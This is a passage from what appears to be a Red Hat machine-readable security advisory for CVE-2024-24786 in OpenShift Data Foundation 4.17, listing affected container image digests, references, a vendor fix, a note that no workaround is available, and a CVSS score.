"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24786", }, { category: "external", summary: "RHBZ#2268046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24786", url: "https://www.cve.org/CVERecord?id=CVE-2024-24786", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24786", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24786", }, { category: "external", summary: "https://go.dev/cl/569356", url: "https://go.dev/cl/569356", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/", url: "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-2611", url: "https://pkg.go.dev/vuln/GO-2024-2611", }, ], release_date: "2024-03-05T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", 